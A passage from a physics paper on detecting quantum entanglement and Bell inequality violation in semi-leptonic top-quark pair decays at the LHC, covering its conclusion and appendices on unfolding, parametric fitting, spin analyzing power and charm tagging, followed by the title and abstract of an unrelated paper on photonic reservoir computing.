parton-level analysis, we performed a detector simulation, followed by parametric fitting to correct the detailed angular observables. We found that this approach leads to a more stable outcome than the practice of unfolding. As a result, the sensitivity for quantum entanglement detection is expected to be 60% better than in the leptonic channel. In 139 fb\({}^{-1}\) (3 ab\({}^{-1}\)) of data at the LHC (HL-LHC), it should be feasible to measure entanglement at a precision of \(\lesssim 3\%\) (0.7%) which is shown in Table 2 and in Fig. 9. Figure 10: Expected significance of CHSH violation detection as a function of the integrated luminosity at the 13 TeV LHC at parton-level (left) and after detector simulation, reconstruction, and parametric fitting (right). The same expectation of 60% improvement applies to Bell inequality violation detection. When compared to previous leptonic studies, the improvement reached a factor of 3 better than for the leptonic channel due to a substantially higher reconstruction efficiency we achieved. The overall detection of Bell inequality violation, however, is still challenging. With 300 fb\({}^{-1}\) (3 ab\({}^{-1}\)) integrated luminosity at the LHC Run-3 (HL-LHC), we expect a sensitivity of 1.3\(\sigma\) (4.1\(\sigma\)) as shown in Table 3 and Fig. 10. A full comparison between previous results is shown in Appendix B. In summary, we demonstrated that the semi-leptonic decay of the \(t\bar{t}\) system is the premier channel for testing entanglement and Bell inequality violation at the LHC. Performing a detector simulation and correcting the results with parametric fitting are indispensable components of an accurate prediction. We project that at the HL-LHC entanglement can be measured nearly to the percent-level and that strong evidence will be obtained for Bell inequality violation. There are a number of future directions such as studying the fully hadronic decay channel of the \(t\bar{t}\) system and describing the small backgrounds in a quantum mechanical framework. The LHC is a promising environment to study quantum mechanics at the TeV scale. ## Acknowledgements The authors would like to thank Mikael Kuusela for detailed discussion on unfolding, Joseph Boudreau and Kun Cheng for useful discussions, and Ze Chen for computing assistance. This work was supported in part by the U.S. Department of Energy under grant Nos. DE-SC0007914 and in part by the Pitt PACC. TH would like to thank the Aspen Center for Physics, where part of this work is complete, which is supported by the National Science Foundation (NSF) grant PHY-1607611. ML is also supported by the National Science Foundation under grant no. PHY-2112829 ## Appendix A Unfolding and Parametric Fitting Consider a distribution \(\vec{x}_{\rm truth}\) that is produced at a collider experiment. For example, the invariant mass spectrum or energy spectrum of a particle. This underlying distribution is not measured directly because the detector itself has limitations and resolutions which result in smearing. Thus the detected distribution is \(\vec{x}_{\rm detected}\). The truth and detected distributions can be related by the forward process which can be called "folding" [71; 72; 73]: \[\vec{x}_{\rm truth}\xrightarrow{\rm folding}\vec{x}_{\rm detected}=R\cdot\vec{ x}_{\rm truth}, \tag{101}\] where the matrix \(R\) is the response matrix that describes the effects of detector smearing and phase space cuts. Only \(\vec{x}_{\rm detected}\) is measured, but we require \(\vec{x}_{\rm truth}\) to extract the underlying physics parameters. To do this, first, \(\vec{x}_{\rm truth}\) is generated by Monte Carlo. Then a detector simulation can produce \(\vec{x}_{\rm detected}\) from \(\vec{x}_{\rm truth}\) which allows us to compute \(R\) from Monte Carlo. Given \(R\) we can make an estimate of \(\vec{x}_{\rm truth}\) that corresponds to some detected data. ### Unfolding Unfolding is the mathematical procedure of inverting Eq. (108) in order to solve for \(\vec{x}_{\rm truth}\): \[\vec{x}_{\rm unfolded}=R^{-1}\cdot\vec{x}_{\rm detected}. \tag{109}\] Once \(\vec{x}_{\rm unfolded}\) is obtained, the underlying physics parameters \(\Theta\) can be extracted through a fit, asymmetry measurement, etc. The response matrix \(R\) quantifies the detector smearing and the loss of events which do not pass phase space cuts, and is therefore often an ill-conditioned matrix. To find a stable inversion of \(R\), one typically needs to apply regularization where ambiguity arises when choosing the form and the strength of the regularization. That is why we write \(\vec{x}_{\rm unfolded}\) in Eq. (109) rather than \(\vec{x}_{\rm truth}\). As explained in Ref. [74], without a careful choice of regularization strength one may induce a bias and underestimate the uncertainty. Recent methods have been proposed to avoid such subtleties [70]. The bias quantifies how far the unfolded distribution \(\vec{x}_{\rm unfolded}\) is from a true inversion of the response matrix applied to \(x_{\rm detected}\). When \(R\) is ill-conditioned, some bias is necessary but a large bias indicates that \(\vec{x}_{\rm unfolded}\) does not accurately describe \(\vec{x}_{\rm truth}\). The variance measures how much the unfolded distribution changes with respect to statistically different detected data. We list several unfolding algorithms in Table 4 along with the package we use for their implementation and their regularization parameters. The Iterative Bayesian (IB) method [67] is regularized by the number of iterations \(n_{I}\). The Singular Value Decomposition (SVD) method [68] is parametrized by \(\tau\) which is the coefficient of the regularization term. The value of \(\tau\) is often set by the square of \(m\)th singular value (in descending order) of a matrix related to the second derivative of the truth distribution. Both of these methods are commonly used in theory studies. The One-at-a-time Strict Bound (OSB) method, on the other hand, is not commonly used, but is free from any regularization [70]. Instead, the inputs are general constraints on the expected shape of the unfolded distribution. To compare methods we consider the two quantities: \(\cos\theta_{n}^{\mathcal{A}}\cos\theta_{n}^{\mathcal{B}}\) and \(\cos\theta_{r}^{\mathcal{A}}\cos\theta_{r}^{\mathcal{B}}\). Events are restricted to the weak signal region described in Sec. 4.4 which is relevant for Bell \begin{table} \begin{tabular}{|c c c|} \hline Method & Package & Regularization \\ & & Parameters \\ \hline Iterative Bayesian (IB) & RooUnfoldBayes[69] & \(n_{I}\) \\ Singular Value Decomposition (SVD) & RooUnfoldSvd[69] & \(\tau\) or \(m\) \\ One-at-a-time Strict Bounds (OSB) & Ref. [70] & \(-\) \\ \hline \end{tabular} \end{table} Table 4: Unfolding algorithms and their regularization parameters. inequality violation. We use an integrated luminosity of 300 fb\({}^{-1}\). The functional form of the truth distribution is given in Eq. (28). In Fig. 11 we show the distribution at parton-level with only signal region cuts (red) and after detector effects and event selection cuts (orange). The uncertainties are determined by calculating the variance from performing the same calculation in different instances of the same dataset, _i.e._ running pseudo-experiments. The response matrices for these processes are shown in Fig. 12. Figure 11 also shows the unfolding methods: OSB (blue), IB (light blue), and SVD (green). For the OSB method over the full domain we require the unfolded distribution to be positive and separately over negative and positive input values we require the unfolded distribution to be monotonic and convex. We follow the aggregation strategy of starting with an initial value \(n_{\rm bin}=48\), before aggregating these into larger bins. For the IB method we use \(n_{I}=4\) and \(n_{\rm bins}=12\) while for the SVD method we use \(m=4\) and \(n_{\rm bins}=12\). The results show a very stable central value for all the methods, however, the uncertainty varies substantially between methods. The OSB method does not have free parameters while the IB and SVD methods do have free parameters. We investigate the dependence on these parameters further below. Intuitively, as the regularization strength increases, more bias is introduced but the variance decreases. When the regularization strength decreases, the bias is reduced but the variance increases. In Table 5 we vary the regularization parameter \(n_{I}\) and the number of bins \(n_{\rm bin}\) using the IB method. We show results for measuring \(C_{nn}\), \(C_{rr}\), and the combination \(C_{nn}-C_{rr}-\sqrt{2}\). We find that the unfolded central values are stable under variations in both \(n_{I}\) and \(n_{\rm bin}\). The uncertainty, on the other hand, is stable under changes in \(n_{\rm bin}\), but varies by up to 75% while changing \(n_{I}\). Larger \(n_{I}\) reduces the regularization which is why the uncertainty increases with \(n_{I}\). Table 6 shows results using the SVD method while varying the regularization parameter Figure 11: Distributions of \(\cos\theta_{n}^{\mathcal{A}}\cos\theta_{n}^{\mathcal{B}}\) (left) and \(\cos\theta_{r}^{\mathcal{A}}\cos\theta_{r}^{\mathcal{B}}\) (right) for parton-level truth data (red), for detector-level data (orange), and after applying the unfolding methods OSB (blue), IB (light blue), and SVD (green), computed at \(\sqrt{s}=13\) TeV. \(m\) and the number of bins \(n_{\rm bin}\). Again, the central value is stable with respect to changes in \(m\) and \(n_{\rm bin}\), but the uncertainty changes with \(n_{\rm bin}\) and with \(m\) up to 75%. A larger value of \(m\) is obtained by varying the \(m\) and \(n_{\rm bin}\) by \(\pm 1\). \begin{table} \begin{tabular}{|c|c|c|c|c|c|} \hline parameter & \(n_{\rm bin}\) & SVD \(m=3\) & SVD \(m=4\) & SVD \(m=5\) & SVD \(m=6\) \\ \hline \multirow{2}{*}{\(C_{nn}\)} & 6 & \(0.749\pm 0.132\) & \(0.749\pm 0.161\) & \(0.749\pm 0.184\) & \(0.750\pm 0.199\) \\ & 12 & \(0.746\pm 0.115\) & \(0.748\pm 0.136\) & \(0.748\pm 0.152\) & \(0.749\pm 0.169\) \\ \hline \multirow{2}{*}{\(C_{rr}\)} & 6 & \(-0.892\pm 0.165\) & \(-0.892\pm 0.230\) & \(-0.900\pm 0.260\) & \(-0.897\pm 0.303\) \\ & 12 & \(-0.894\pm 0.142\) & \(-0.899\pm 0.189\) & \(-0.900\pm 0.209\) & \(-0.899\pm 0.245\) \\ \hline \multirow{2}{*}{\(C_{nn}-C_{rr}-\sqrt{2}\)} & 6 & \(0.226\pm 0.211\) & \(0.227\pm 0.280\) & \(0.235\pm 0.318\) & \(0.232\pm 0.363\) \\ & 12 & \(0.226\pm 0.167\) & \(0.232\pm 0.219\) & \(0.233\pm 0.247\) & \(0.234\pm 0.287\) \\ \hline \end{tabular} \end{table} Table 6: Parameter estimation via unfolding with the SVD method. Figure 12: Response matrix of \(\cos\theta_{n}^{\cal A}\cos\theta_{n}^{\cal B}\) (left) and \(\cos\theta_{r}^{\cal A}\cos\theta_{r}^{\cal B}\) (right) computed at \(\sqrt{s}=13~{}{\rm TeV}\). Parton-level events have signal region cuts and no event selection, while detector-level events include detector effects and the effects of event selection described in Sec. 4.2. \(m\) means taking a smaller squared singular value which corresponds to less regularization. ### Parametric Fitting When only the extracted physics parameter \(\Theta\) is required and not the full distribution \(\vec{x}_{\rm truth}\) one can calculate the dependence of the truth distribution on the parameter \(\Theta\). This is the method more commonly used by experimentalists [71; 72; 73] and in this work we will call it "parametric fitting." This is sometimes called template fitting when the functional dependence of \(\Theta\) is unknown and template distributions are used. Writing the truth distribution as a function of \(\Theta\) we have \[\vec{x}_{\rm truth}(\Theta)\xrightarrow{\rm folding}\vec{x}_{\rm predicted}( \Theta)=R\cdot\vec{x}_{\rm truth}(\Theta). \tag{101}\] The parameter \(\Theta\) is now extracted by fitting \(\vec{x}_{\rm predicted}(\Theta)\) to \(\vec{x}_{\rm detected}\). We perform this parameter extraction by a binned maximum likelihood fit where the likelihood function is \[L(\Theta) =\prod_{\alpha=1}^{\rm n_{bins}}\text{Poisson}\left(x_{\rm detected,\alpha},x_{\rm predicted,\alpha}(\Theta)\right), \tag{102}\] \[=\prod_{\alpha=1}^{\rm n_{bins}}\text{Poisson}\left(x_{\rm detected,\alpha},\sum_{\beta}R_{\alpha\beta}x_{\rm truth,\beta}(\Theta)\right), \tag{103}\] where \(\text{Poisson}(x,\lambda)\) is the Poisson distribution for random variable \(x\) with mean \(\lambda\). The response matrix \(R\) is calculated from simulation, the distribution \(x_{\rm truth}(\Theta)\) as a function of \(\Theta\) is known analytically in all cases that we study. For example, for \(\Theta=C_{ij}\), the truth distribution is given by Eq. (10). To obtain \(\Theta\) we maximize the logarithm of the likelihood function. As with unfolding, the uncertainty is calculated by performing pseudo-experiments. When varying the number of bins (\(n_{\rm bin}=5,10,20\)) we find the uncertainty changes by less than \(5\%\). Table 7 contrasts the results from parametric fitting with OSB unfolding. The truth result is used as a baseline where there are no smearing effects, but the number of events used to determine the uncertainty is rescaled by the average reconstruction efficiency. While OSB unfolding does not have a dependence on regularization the resulting uncertainties are \begin{table} \begin{tabular}{|c|c|c|c|} \hline & Truth & OSB Unfolding & Parametric Fitting \\ \hline \(C_{nn}\) & \(0.754\pm 0.079\) & \(0.748\pm 0.370\) & \(0.754\pm 0.116\) \\ \hline \(C_{rr}\) & \(-0.884\pm 0.079\) & \(-0.890\pm 0.472\) & \(-0.892\pm 0.137\) \\ \hline \(C_{nn}-C_{rr}-\sqrt{2}\) & \(0.224\pm 0.112\) & \(0.223\pm 0.600\) & \(0.231\pm 0.179\) \\ \hline \end{tabular} \end{table} Table 7: Parameter estimation via OSB unfolding and parametric fitting computed at \(\sqrt{s}=13\) TeV in the weak signal region. The uncertainties on the truth results are statistical. substantially larger than the statistical uncertainties. Parametric fitting also does not depend on regularization and increases the uncertainty, but by a more modest amount. The increase in uncertainty depends on the detector smearing, the phase space cuts, and the form of the expected distribution for the parameter. For this reason, each fitted parameter has a different increase in uncertainty relative to the statistics only uncertainty. In Table 7 the increase is about a factor of \(1.4-1.7\), while for concurrence it is a factor of \(1.9-3.4\) and for Bell inequality violation it is a factor of \(1.6-2.2\). ## Appendix B Comparison to Previous Results As a validation step, we compare our results with the parton-level results in Ref. [8] and the detector-level results in Ref. [6]. Our results are for the semi-leptonic channel and we use the event selection specified in Sec. 4.2. For the purposes of comparison we do not use our signal regions but instead use the signal regions from Ref. [8] and Ref. [6]. The parton-level comparison is shown in Table 8. We apply an efficiency of 0.12 and use a luminosity of 139 fb\({}^{-1}\) to match Ref. [8]. The central values agree relatively well. The small differences may result from using different PDF sets [8]. As estimated in Sec. 4.1 our uncertainties should be about 60% smaller than the leptonic results. The table confirms this is an accurate estimation. The detector-level comparison is shown in Table 9. We use a luminosity of 139 fb\({}^{-1}\) for entanglement and 350 fb\({}^{-1}\) for CHSH violation to match Ref. [6]. In the threshold region the efficiencies are similar: their leptonic sample has an efficiency of 0.08 while our semi-leptonic sample has an efficiency of 0.012. In the high-\(p_{T}\) region their leptonic sample has an efficiency of 0.011 (taken from Appendix B of Ref. [8]) while our semi-leptonic sample has an efficiency of 0.08. The higher efficiency in the semi-leptonic sample is expected. For entanglement, the central values are similar, but not quite matching. Our central values in these regions, however, do match with those from Ref. [8]. For the "threshold, strong" region our uncertainty is larger by a factor of 2. In this region the unfolding adds no uncertainty in Ref. [6] while in our work the parametric fitting always increases the uncertainty by a factor of \(1.6-3\). Accounting for the 60% improvement from statistics in the semi-leptonic these results are consistent. In the "high-\(p_{T}\), strong" region our uncertainty is lower by 25%. \begin{table} \begin{tabular}{|c|c|c|c|c|} \hline Observable & \multicolumn{2}{|c|}{Entanglement: \(|C_{rr}+C_{kk}|-C_{nn}-1\)} & \multicolumn{2}{|c|}{CHSH: \((C_{rr}-C_{nn})-\sqrt{2}\)} \\ \hline Region & Threshold \(\not{\beta}\) & Threshold \(\beta\) & Boosted & Boosted \\ \hline Ref. [8] & \(0.560\pm 0.020\) & \(0.680\pm 0.022\) & \(0.671\pm 0.069\) & \(0.218\pm 0.141\) \\ \hline This work & \(0.529\pm 0.013\) & \(0.634\pm 0.015\) & \(0.650\pm 0.042\) & \(0.212\pm 0.085\) \\ \hline \end{tabular} \end{table} Table 8: Parton-level comparison between leptonic results from Ref. [8] with semi-leptonic results from this work. The semi-leptonic channel is expected to have uncertainties that are 60% smaller. The unfolding from Ref. [6] increased the uncertainty by about a factor of 1.5. For CHSH violation, the central values are consistent. In the "high-\(p_{T}\), strong" our uncertainty is a factor of 3.4 smaller. While the unfolding from Ref. [6] still only increases the statistical uncertainty by a factor of 1.5, the reconstruction efficiency in our sample is much higher. Finally, we briefly compare to Ref. [16]. They provide detector-level results which include a deep neural network reconstruction algorithm and SVD unfolding. Our weak signal region from Sec. 4.4 has approximately a factor of 3 times more events than the signal region used in Ref. [16]. In addition, our parametric fitting increases the statistical uncertainty by a factor of roughly 3 while in Ref. [16] the unfolding decreases the statistical uncertainty slightly. ## Appendix C Spin Analyzing Power for Hadronic Top Decays Consider an ensemble of polarized top quarks with polarization vector \(\vec{B}\), where \(0\leq|\vec{B}|\leq 1\). The differential decay width of the top quark is \[\frac{1}{\Gamma}\frac{d\Gamma}{d\cos\theta_{v}}=\frac{1}{2}\left(1+|\vec{B}| \kappa_{v}\cos\theta_{v}\right), \tag{109}\] where \(\cos\theta_{v}=(\vec{B}\cdot\vec{v})/(|\vec{B}||\vec{v}|)\) for a direction \(\vec{v}\) associated with the decay products. The coefficient \(\kappa_{v}\) is the spin analyzing power associated with the direction \(\vec{v}\). In the leptonic decay of a top quark, if \(\vec{v}=\vec{p}_{\ell^{+}}\) then \(\kappa_{\ell^{+}}=1.0\). The spin analyzing power ranges from \(-1\) to \(+1\), so the anti-lepton carries the maximum amount of information about the polarization of the top quark. The spin analyzing powers of the other decay products can be calculated and, at leading order, are [75] \[\kappa_{W^{+}}=0.40,\qquad\kappa_{b}=-0.40,\qquad\kappa_{\nu}=-0.34. \tag{110}\] For the decay of anti-top quark, the spin analyzing power is equal in magnitude and opposite in sign for the corresponding anti-particles in the decay product. In hadronic decays of the top quark, the vertex structure is the same with the replacement of \(\ell^{+}\to\) down-type anti-quark and \(\nu\to\) up-type quark. The complication in this case is that the down-type anti-quark \begin{table} \begin{tabular}{|c|c|c|c|} \hline Observable & Entanglement: \(|C_{rr}+C_{kk}|-C_{nn}-1\) & CHSH: \((C_{rr}-C_{nn})-\sqrt{2}\) \\ \hline Region & Threshold, strong & High-\(p_{T}\), strong & High-\(p_{T}\), strong \\ \hline Ref. [6] & \(0.38\pm 0.02\) & \(0.42\pm 0.10\) & \(0.21\pm 0.54\) \\ \hline This work & \(0.45\pm 0.04\) & \(0.58\pm 0.08\) & \(0.19\pm 0.16\) \\ \hline \end{tabular} \end{table} Table 9: Detector-level comparison between leptonic results from Ref. [6] with the semi-leptonic results from this work. The semi-leptonic channel is expected to have uncertainties that are 60% smaller without accounting for differences in reconstruction efficiency. The CHSH result from Ref. [6] is multiplied by \(1/\sqrt{2}\) to match our normalization. cannot be distinguished from the up-type quark on an event-by-event basis. They are both detected as jets. Early on, the softer jet (the jet with the lower energy in the top rest frame) was used and has a spin analyzing power of \(\kappa_{\rm soft}=0.50\)[75]. The intuition is that the down-type anti-quark tends to be emitted closer to the \(b\)-quark which makes it more often become the softer jet. In Ref. [51] it was shown that the optimal spin analyzing power uses a weighted sum of both the quark and anti-quark. The optimal hadronic direction \(\vec{p}_{\rm opt}\) is \[\vec{p}_{\rm opt}(\cos\theta_{W})=P_{d\to p_{\rm soft}}(\cos\theta_{W})\, \hat{p}_{\rm soft}+P_{d\to p_{\rm hard}}(\cos\theta_{W})\,\hat{p}_{\rm hard}, \tag{111}\] where \(\hat{p}_{\rm soft}\) is the normalized three-momentum of the softer jet, \(\hat{p}_{\rm hard}\) is the normalized three-momentum of the harder jet, and \(\theta_{W}\) is the angle between one of the \(W\) decay products and the \(W\) momentum axis in the \(W\) rest frame (shown in Fig. 2). The functions \(P_{d\to p_{\rm soft}}(\cos\theta_{W})\) and \(P_{d\to p_{\rm hard}}(\cos\theta_{W})\) are \[P_{d\to p_{\rm soft}}(\cos\theta_{W}) =\frac{f(-|\cos\theta_{W}|)}{f(|\cos\theta_{W}|)+f(-|\cos\theta_{ W}|)}, \tag{112}\] \[P_{d\to p_{\rm hard}}(\cos\theta_{W}) =\frac{f(|\cos\theta_{W}|)}{f(|\cos\theta_{W}|)+f(-|\cos\theta_{ W}|)}. \tag{113}\] The function \(f(\cos\theta_{W})\) is the probability distribution of \(\cos\theta_{W}\) which depends on the polarization of the \(W\) boson coming from the decay of the top [51]. Neglecting the \(b\) mass the distribution is \[f(\cos\theta_{W})=\frac{3}{4}\frac{m_{t}^{2}}{m_{t}^{2}+2m_{W}^{2}}(1-\cos^{2 }\theta_{W})+\frac{3}{8}\frac{2m_{W}^{2}}{m_{t}^{2}+2m_{W}^{2}}(1-\cos\theta_ {W})^{2}. \tag{114}\] The dependence of Eq. (111) on \(\cos\theta_{W}\) means that the spin analyzing power also is a function of \(\cos\theta_{W}\). The dependence of the spin analyzing power on \(\cos\theta_{W}\) is nearly flat [51]. From theory, the predicted integrated value of the spin analyzing power is \(\kappa_{\rm opt}=0.638\). To ensure the validity of our results for entanglement and Bell inequality violation we compute the spin analyzing power from simulation. We use Madgraph 5[56] to generate a sample of polarized top quarks. The differential decay width as a function of \(\cos\theta\) taken with respect to \(\vec{p}_{\rm opt}\) is shown in Fig. 13. The parton-level distribution is shown in red and yields a value of \(\kappa_{\rm opt}=0.640\pm 0.004\). The distribution at the uncorrected detector-level is shown in orange. The blue markers indicate the distribution after unfolding and lead to a value of \(\kappa_{\rm opt}=0.654\pm 0.037\). Using parametric fitting yields \(\kappa_{\rm opt}=0.642\pm 0.030\). These numbers are summarized in Table 10. Having shown the robustness of the optimal hadronic spin analyzing power we use the value of \(\kappa_{\rm opt}=0.64\) in our results for entanglement and Bell inequality violation. ## Appendix D Quantum versus Fictitious States In this appendix we highlight relevant differences between quantum states and fictitious states. ### Non-Spin Degrees of Freedom The \(t\bar{t}\) system at a collider is labeled by the top quark momentum in center-of-mass frame \(\vec{k}\), the velocity \(\vec{v}\) of the \(t\bar{t}\) system relative to the lab frame, and the spins of the top and the anti-top quarks. We denote the spin as \(\left|\alpha\right\rangle=\left|\text{spin of }t\right\rangle\otimes\left|\text{ spin of }\bar{t}\right\rangle\). The spin density matrix \(\rho_{\text{spin}}\) for the \(t\bar{t}\) system with a given \(\vec{k}\) and \(\vec{v}\) (which we will refer to as individual density matrix) can be written as \[\rho_{\text{spin}}(\vec{k},\vec{v})=\sum_{\alpha,\beta}\rho(\vec{k},\vec{v})_ {\alpha,\beta}\left|\alpha\right\rangle\left\langle\beta\right|. \tag{101}\] Each value of \(\vec{k}\) and \(\vec{v}\) yields a distinct quantum state. \begin{table} \begin{tabular}{|c|c|c|c|c|} \hline & Theory & Parton-level & Unfolded & Parametric Fitted \\ \hline \(\kappa_{\text{opt}}\) & \(0.638\) & \(0.640\pm 0.004\) & \(0.654\pm 0.037\) & \(0.642\pm 0.030\) \\ \hline \end{tabular} \end{table} Table 10: Calculated values of the optimal hadronic spin analyzing power in top decays at theory-level, at parton-level, after unfolding, and after parametric fitting. The uncertainties are from Monte Carlo statistics. Figure 13: Differential decay width of the top quark at parton-level (red), uncorrected detector-level (orange), and after unfolding (blue markers). #### Quantum States To find the total spin density matrix for the \(t\bar{t}\) system produced in a collider, we perform the sum over the phase space \(\Pi\) \[\rho_{\rm spin}(\Pi)=\sum_{\vec{k},\vec{v}\in\Pi}\rho_{\rm spin}(\vec{k},\vec{v} )=\sum_{\alpha,\beta}\Big{(}\sum_{\vec{k},\vec{v}\in\Pi}\rho(\vec{k},\vec{v})_{ \alpha,\beta}\Big{)}\left|\alpha\right\rangle\left\langle\beta\right|\,, \tag{114}\] where each matrix element must be evaluated in the same fixed frame. The \(\rho_{\rm spin}(\Pi)\) obtained in this way is a "physical" state, in the sense that if we measure the spin observable \(\mathcal{O}\), then its expectation value is simply given by \(\left\langle\mathcal{O}\right\rangle=\mathrm{tr}(\mathcal{O}\rho_{\rm spin}(\Pi))\). We would also call this a genuine quantum state. Quantum states, however, can exhibit cancellations in the entanglement of the total spin density matrix, despite entanglement among individual spin density matrices. This cancellation occurs due to the summation over the azimuthal angle of the production plane. For example, consider the case where \(\vec{v}=0\) and each \(t\bar{t}\) pair is produced with an angle \(\theta\) in the \(y-z\) plane with a spin correlation matrix of \(C_{11}\approx-C_{22}\approx C_{33}\approx 1\) (all other entries are \(0\)). The concurrence would be \(\mathcal{C}\approx 1\) corresponding to maximal entanglement. By rotational symmetry around the \(z\)-axis, each \(t\bar{t}\) pair with the same polar angle \(\theta\), but different azimuthal angle \(\phi\) is also maximally entangled. The spin correlation matrix is \[C=\begin{pmatrix}\cos^{2}\!\phi\,C_{11}+\sin^{2}\!\phi\,C_{22}&(C_{11}-C_{22}) \cos\phi\sin\phi&0\\ (C_{11}-C_{22})\cos\phi\sin\phi&\sin^{2}\!\phi\,C_{11}+\cos^{2}\!\phi\,C_{22} &0\\ 0&0&C_{33}\end{pmatrix}. \tag{115}\] Just as with the total spin density matrix, the total spin correlation matrix \(C\) is given by the sum of \(C\) in Eq. (115) over \(\phi\). After the summation the diagonal elements become: \((C_{11}+C_{22})/2\approx 0\), \((C_{11}+C_{22})/2\approx 0\), and \(C_{33}\approx 1\) leading to a concurrence \(\mathcal{C}\approx 0\). In this example, the sum of maximally entangled states became non-entangled, which is the case for the \(t\bar{t}\) system with high \(p_{T}\) at the LHC. This is why in the boosted region there is no significant entanglement in the fixed beam basis. The helicity basis, on the other hand, does exhibit large entanglement because it does not correspond to a quantum state. #### The Average of Concurrence Instead of computing the concurrence of a quantum state \(\rho_{\rm spin}(\Pi)\), we can use other quantities that will not exhibit the same cancellations, and consequently will enhance the experimental detection. This can be accomplished by computing the average of the concurrence \(\overline{\mathcal{C}}\) over states with different \(\vec{k}\) and evaluated in the center-of-mass frame where \(\vec{v}=0\): \[\overline{\mathcal{C}}=\sum_{\vec{k},\vec{v}}\mathcal{C}(\rho_{\rm spin}(\vec{ k},0)). \tag{116}\] This should be contrasted with the concurrence of the quantum state \(\mathcal{C}(\sum_{\vec{k},\vec{v}}\rho_{\rm spin}(\vec{k},\vec{v}))\). Since the concurrence is invariant under rotations, we can evaluate each term \(\mathcal{C}(\rho_{\rm spin}(\vec{k},0))\) in the helicity basis. Using the results from Eq. (3.16a) we find \[\mathcal{C}(\rho_{\rm spin}(\vec{k},0))=(1/2)\max(-C_{nn}(\vec{k})+|C_{kk}(\vec{ k})+C_{rr}(\vec{k})|-1,0)\] which leads to \[\overline{\mathcal{C}} =\sum_{\vec{k},\vec{v}\in\Pi}\frac{1}{2}{\rm max}\big{(}-C_{nn}( \vec{k})+|C_{kk}(\vec{k})+C_{rr}(\vec{k})|-1,0\big{)},\] (D.5) \[\geq\frac{1}{2}{\rm max}\Bigg{(}-\sum_{\vec{k},\vec{v}\in\Pi}C_{nn }(\vec{k})+\bigg{|}\sum_{\vec{k},\vec{v}\in\Pi}(C_{kk}(\vec{k})+C_{rr}(\vec{k} ))\bigg{|}-1,0\Bigg{)},\] (D.6) \[=\mathcal{C}(\overline{\rho}_{\rm spin}(\Pi)).\] (D.7) Going from Eq. (D.6) to Eq. (D.7) requires \(\sum_{\vec{k},\vec{v}}C_{nn}<0\) and that \(\sum_{\vec{k},\vec{v}}C_{rk}=\sum_{\vec{k},\vec{v}}C_{kr}\) are the only two non-vanishing off-diagonal entries of \(\sum_{\vec{k},\vec{v}}C_{ij}\). These conditions are true for both near threshold and in the boosted region. #### Fictitious States In Eq. (D.7) we define the density matrix of a "fictitious state" \(\overline{\rho}_{\rm spin}(\Pi)\) \[(\overline{\rho}_{\rm spin}(\Pi))_{\alpha,\beta}=\sum_{\vec{k},\vec{v}\in\Pi} \rho(\vec{k},0)_{\alpha(\vec{k}),\beta(\vec{k})},\] (D.8) where \(\alpha\) and \(\beta\) denote the axes along which we measure the spin. Each term in the summation should be evaluated in its own center-of-mass frame. In the helicity basis, these axes depend on \(\vec{k}\) which is why they are written as \(\alpha(\vec{k})\) and \(\beta(\vec{k})\) on the right-hand side. On the other hand, a quantum state is given by \((\rho_{\rm spin}(\Pi))_{\alpha,\beta}=\sum_{\vec{k},\vec{v}}\rho(\vec{k}, \vec{v})_{\alpha,\beta}\) (see Eq. (D.2)), where each term in the sum has a certain center-of-mass velocity and the spin is measured along the same axes. There is not an obvious physical interpretation for the fictitious state in Eq. (D.8), however, by Eqs. (D.5 - D.7) the average concurrence \(\overline{\mathcal{C}}\) is greater than or equal to the concurrence of the fictitious state. Therefore, \[\mathcal{C}(\overline{\rho}_{\rm spin}(\Pi))>0\qquad\quad\Rightarrow\qquad \quad\overline{\mathcal{C}}>0.\] (D.9) This means that when the concurrence of the fictitious state is positive, there exists a sub-state that is entangled. The same argument can be applied to CHSH violation. In the main text, concurrence and CHSH violation are measured using fictitious states. The derivation here justifies their validity in searches for entanglement and Bell inequality violation. ## Appendix E Charm Tagging An alternative to using the optimal hadronic direction is to only consider events with charm quarks. In this case, the down-type quark (the strange quark) can be identified as the jet that is not charm-tagged. Let the charm-tagging efficiency be \(\epsilon_{c}\). Adapting Eq. (4.4) we have \[\frac{\text{significance }(t\bar{t}\to\ell s)}{\text{significance }(t\bar{t}\to\ell\ell)}=\frac{\kappa_{s}\kappa_{\ell}}{\kappa_{\ell} \kappa_{\ell}}\sqrt{\frac{\epsilon_{c}\text{BR}(t\bar{t}\to s\ell)}{\text{BR}( t\bar{t}\to\ell\ell)}}=1.78\sqrt{\epsilon_{c}}. \tag{112}\] In order for the subset of charm-tagged semi-leptonic events to be more sensitive than all semi-leptonic events, it is necessary that \(1.78\sqrt{\epsilon_{c}}>1.60\) or \(\epsilon_{c}>0.95\). In several analyses, the operating point used for charm-tagging has an efficiency of \(30-40\%\) with a light-quark jet mistag rate of about \(5\%\)[76, 77]. Instead of only using charm-tagged events, it may be beneficial to combine two signal regions. The first signal region would consist of charm-tagged events and would use the strange-inferred jet, while the second signal region would consist of the rest of the semi-leptonic events and would use the optimal hadronic direction.
2310.16588
Multi-Task Wavelength-Multiplexed Reservoir Computing Using a Silicon Microring Resonator
Among the promising advantages of photonic computing over conventional computing architectures is the potential to increase computing efficiency through massive parallelism by using the many degrees of freedom provided by photonics. Here, we numerically demonstrate the simultaneous use of time and frequency (equivalently wavelength) multiplexing to solve three independent tasks at the same time on the same photonic circuit. In particular, we consider a microring-based time-delay reservoir computing (TDRC) scheme that simultaneously solves three tasks: Time-series prediction, classification, and wireless channel equalization. The scheme relies on time-division multiplexing to avoid the necessity of multiple physical nonlinear nodes, while the tasks are parallelized using wavelength division multiplexing (WDM). The input data modulated on each optical channel is mapped to a higher dimensional space by the nonlinear dynamics of the silicon microring cavity. The carrier wavelength and input power assigned to each optical channel have a high influence on the performance of its respective task. When all tasks operate under the same wavelength/power conditions, our results show that the computing nature of each task is the deciding factor of the level of performance achievable. However, it is possible to achieve good performance for all tasks simultaneously by optimizing the parameters of each optical channel. The variety of applications covered by the tasks shows the versatility of the proposed photonic TDRC scheme. Overall, this work provides insight into the potential of WDM-based schemes for improving the computing capabilities of reservoir computing schemes.
Bernard J. Giron Castro, Christophe Peucheret, Darko Zibar, Francesco Da Ros
2023-10-25T12:24:56Z
http://arxiv.org/abs/2310.16588v2
